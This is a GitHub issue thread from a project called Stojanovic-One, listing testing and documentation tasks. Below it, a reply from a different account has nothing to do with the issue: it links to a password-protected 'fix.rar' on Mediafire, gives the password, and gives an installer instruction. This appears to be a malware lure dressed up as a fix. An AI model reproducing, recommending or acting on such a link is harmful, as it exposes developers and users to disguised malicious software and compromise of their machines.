### ISSUE TITLE
Issue 5: Testing and Documentation

### ISSUE THREAD

**Issue by Djordje-Stojanovic** [Djordje-Stojanovic/Stojanovic-One#74]
Description: Ensure new features are properly tested and documented.
Tasks:
[ ] Write unit tests for new components and functions
[ ] Update end-to-end tests to cover new user flows
[ ] Update README.md with new features and setup instructions
[ ] Document theme customization process

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
